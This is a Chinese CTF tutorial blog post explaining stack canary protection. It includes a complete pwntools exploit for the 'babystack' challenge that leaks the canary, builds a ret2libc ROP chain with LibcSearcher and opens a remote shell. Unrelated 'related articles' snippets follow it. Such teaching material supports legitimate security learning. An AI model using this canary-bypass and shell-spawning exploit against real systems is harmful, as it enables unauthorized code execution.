Canary保护

2023-11-10 19:59
文章标签 保护 canary

本文主要是介绍Canary保护,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。

学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。

栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。

一大段子很烦,看图:32位情况下栈图,左边是正常的,右边是开了canary保护的情况。

进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。

来道例题看看如何破解,常见一种方法就是puts出canary,我们得到他之后在原来的栈溢出上再加个canary就可以绕过了。

看一下攻防世界进阶区的pwn1。

打开checksec,开的很全,除了pie开全乎了。

打开ida

逻辑很简单,自己打开读一下就行了。

主要看一下真实的canary长啥样 。

这是main函数

 

f5下显示是
v6 = __readfsqword(0x28u);
汇编下mov     rax, fs:28hmov     [rbp+var_8], rax

再看一下main结束时发生什么

 

 看一下jz判断哪里,如果不相等就挑一个 stack check fail的函数

这下算是彻底清晰了

fs:xx中。FS寄存器指向当前活动线程的TEB结构(线程结构)

理论上来说,对于我们就是随机的,所以我们像绕过去栈溢出,一般是老老实实把canary得到。

canary还有一个特点,第一个字符为’\x00’,目的就是为了截断防止泄露出来canary。我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。

得到canary后的操作还是ret2libc的常规操作

exp如下:

from pwn import *
from LibcSearcher import *
p = remote('111.200.241.244',59735)
elf = ELF("./babystack")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0000000000400908
pop_rdi = 0x0000000000400a93p.sendlineafter('>> ','1')
payload = b'a' * (0x90 - 8) 
p.sendline(payload)  # 等价于p.send('a' * 0x88 + '\n')
p.sendlineafter('>> ','2')
p.recvuntil('aaaa\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
payload1 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ',b'1')
p.send(payload1)
p.sendlineafter('>> ',b'3')
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.success("puts_addr +: " + hex(puts_addr)
)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('>> ','1')
payload2 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)
p.send(payload2)
p.sendlineafter('>> ','3')
p.interactive()

其中注释那个等价我再带一嘴,read函数在读取时类似gets,会把空格也算入,除此以外还会把最后的换行符算入,也就是\n。(小声嘀咕:(第一次分清换行符和回车符,那个u64是咋算开头的空字符的,知识盲区了属于是)

这篇关于Canary保护的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/384915

相关文章

PDF 软件如何帮助您编辑、转换和保护文件。

如何找到最好的 PDF 编辑器。 无论您是在为您的企业寻找更高效的 PDF 解决方案,还是尝试组织和编辑主文档,PDF 编辑器都可以在一个地方提供您需要的所有工具。市面上有很多 PDF 编辑器 — 在决定哪个最适合您时,请考虑这些因素。 1. 确定您的 PDF 文档软件需求。 不同的 PDF 文档软件程序可以具有不同的功能,因此在决定哪个是最适合您的 PDF 软件之前,请花点时间评估您的

如何保护自己的个人隐私

个人隐私保护概览 在数字时代,个人隐私保护显得尤为重要。随着信息技术的发展,个人信息的收集、存储、使用变得更加便捷,同时也带来了隐私泄露的风险。为了保护个人隐私,我们需要从多个维度出发,采取一系列措施来确保个人信息的安全。 个人隐私泄露风险 个人隐私泄露主要来源于以下几个方面: 社交网络:在社交平台上分享信息时,如果不恰当地设置了隐私权限,可能会导致敏感信息被公开。网络服务:在使用网络服务

【电子通识】半导体工艺——保护晶圆表面的氧化工艺

在文章【电子通识】半导体工艺——晶圆制造中我们讲到晶圆的一些基础术语和晶圆制造主要步骤:制造锭(Ingot)、锭切割(Wafer Slicing)、晶圆表面抛光(Lapping&Polishing)。         那么其实当晶圆暴露在大气中或化学物质中的氧气时就会形成氧化膜。这与铁(Fe)暴露在大气时会氧化生锈是一样的道理。 氧化膜的作用         在半导体晶圆

FreeRTOS学习笔记(四)Freertos的中断管理及临界保护

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、Cortex-M 中断管理1.1 中断优先级分组1.2 相关寄存器1.3 相关宏定义1.4 FreeRTOS 开关中断 二、临界段及其保护2.1 taskENTER_CRITICAL( ) 和 taskEXIT_CRITICAL( )2.2 taskENTER_CRITICAL_FROM_ISR( )

操作系统安全保护

操作系统安全概述 概念:满足安全策略要求,具有响应安全机制及安全功符合特定安全标准,在一定约束条件下 能抵御常见网络安全威胁,保障自身安全运行及资源安全 安全等级:根据安全功能和安全保障要求分为 用户自主保护级  系统审计保护级 安全标记保护级 结构化保护级 访问验证保护级 操作系统作用: 负责计算系统的资源管理、支撑和控制各种应用程序运行,为用户提供计算机系统管理接口 是构成网络信息

QDI主板的保护功能导致的电脑关机故障

由于QDI主板中的一种系统保护技术CPU Triple protection被激活导致电脑在刚开机几分钟后就自动关机的。   这种技术在用户开机时就开始运行,对CPU的温度进行实时的侦测,当发现CPU达到一定温度时即强行将CPU进行降速工作状态。如果温度继续升高,达到危险值时便会强行关机,以保护CPU,不会因为温度过高而烧毁。作为QDI的创新技术这一,这项技术主要是为了避免因CPU风扇安装不善

SpringBoot自定义classloader加密保护class文件

背景 最近针对公司框架进行关键业务代码进行加密处理,防止通过jd-gui等反编译工具能够轻松还原工程代码,相关混淆方案配置使用比较复杂且针对springboot项目问题较多,所以针对class文件加密再通过自定义的classloder进行解密加载,此方案并不是绝对安全,只是加大反编译的困难程度,防君子不防小人,整体加密保护流程图如下图所示 maven插件加密 使用自定义maven插件对编

js混淆保护在线工具开源项目大全

具体前往:js代码混淆加密保护工具&开源项目大全

CAD图纸怎么加密?这10款图纸加密工具轻松保护图纸文件

在设计和工程领域,CAD图纸是企业宝贵的知识产权和核心竞争力的体现。随着数字化进程的加速,图纸文件的安全性问题日益凸显,未经授权的访问和泄露风险也随之增加。因此,采取有效的加密措施来保护CAD图纸的安全变得至关重要。本文将介绍10款高效的图纸加密工具,它们能够帮助设计者和企业轻松保护其图纸文件,确保设计成果不被非法获取或滥用。 1.安秉图纸加密软件 安秉图纸加密软件是一款专为企业和设计师开

图纸安全管理措施有哪些?这九大措施全方位保护图纸安全

图纸安全管理措施是一个综合性的体系,旨在通过技术手段和管理措施确保图纸的机密性、完整性和可用性。以下是一些关键的图纸安全管理措施,以及软件安企神的应用。 一、保密协议与意识教育 签订保密协议:与所有接触图纸的员工签署保密协议,明确保密责任和违约后果,形成法律约束。 意识教育:定期开展保密教育培训,通过案例分析、法律法规解读等形式,提高员工的保密意识,树立“图纸即机密,保密无小事”的观念。